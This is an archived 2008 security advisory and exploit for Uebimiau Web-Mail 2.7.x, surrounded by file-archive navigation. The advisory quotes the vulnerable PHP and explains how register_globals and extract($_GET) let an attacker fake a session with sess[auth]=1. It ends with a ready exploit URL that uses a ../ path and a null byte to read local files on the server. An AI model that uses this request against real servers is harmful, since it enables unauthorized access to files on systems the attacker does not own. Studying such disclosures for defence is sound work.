uebimiau-disclose.txt

uebimiau-disclose.txt: Posted Jan 7, 2008; Authored by Eugene Minaev | Site itdefence.ru; Uebimiau Web-Mail versions 2.7.10 and 2.7.2 remote file disclosure exploit.; tags | exploit, remote, web, info disclosure; SHA-256 | b8d7b04407659575cf8f8665fa836b1bc6f536840aa16b967a0eae4904004c01; Download | Favorite | View

uebimiau-disclose.txt

----[ Uebimiau Web-Mail Remote File Reader ... ITDefence.ru Antichat.ru ]

              Uebimiau Web-Mail Remote File Reader
              Eugene Minaev underwater@itdefence.ru
        ___________________________________________________________________
      ____/  __ __ _______________________ _______  _______________    \  \   \
      / .\  /  /_// //              /        \       \/      __       \   /__/   /
      / /     /_//              /\        /       /      /         /     /___/
      \/        /              / /       /       /\     /         /         /
      /        /               \/       /       / /    /         /__       //\
      \       /    ____________/       /        \/    __________// /__    // /   
      /\\      \_______/        \________________/____/  2007    /_//_/   // //\
      \ \\                                                               // // /
      .\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
      . \_\\________[________________________________________]_________//_//_/ . .
     
    
    At first i decided to look login script . Each script includes this code
    
    <?php
    if(strlen($f_pass) > 0) {

    ..elseif (
    ($sess["auth"] && intval((time()-$start)/60) < $idle_timeout)) {

    $UM->mail_user   = $f_user    = $sess["user"];
    $UM->mail_pass   = $f_pass    = $sess["pass"];
    $UM->mail_server = $f_server  = $sess["server"];
    $UM->mail_email  = $f_email   = $sess["email"];

    } else {
    Header("Location: ./index.php?tid=$tid&lid=$lid\r\n"); 
    exit; 
    } 
    ?>
    
    So , if register_globals on , we can make a request like script.php?f_pass=+toxa+&sess[auth]=1 
    to make script think that we are authorized user . Then i looked each script to find something 
    interest.
    
    <?php
    define("SMARTY_DIR","./smarty/");
    require_once(SMARTY_DIR."Smarty.class.php");
    $smarty = new Smarty;
    $smarty->compile_dir = $temporary_directory;
    $smarty->security=true;
    $smarty->secure_dir=array("./");
    $smarty->assign("umLanguageFile",$selected_language.".txt");  
    ?>
    
    Looks great  :)  But selected_language was already defined . But there was a similar code with EXTRACT.
    So , we can read local files on server !
    
    <?php
    if($phpver >= 4.1) {
    extract($_GET);
    }

    $smarty->assign("umSid",$sid);
    $smarty->assign("umLid",$lid);
    $smarty->assign("umTid",$tid);

    $smarty->assign("umErrorCode",$err);

    $smarty->display("$selected_theme/error.htm");
    ?>
    
    http://test1.ru/uebimiau/error.php?f_pass=blackybr&sess[auth]=1&selected_theme=../ksuri.php%00
    
    
    

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

uebimiau-disclose.txt

uebimiau-disclose.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

uebimiau-disclose.txt

Share This

uebimiau-disclose.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems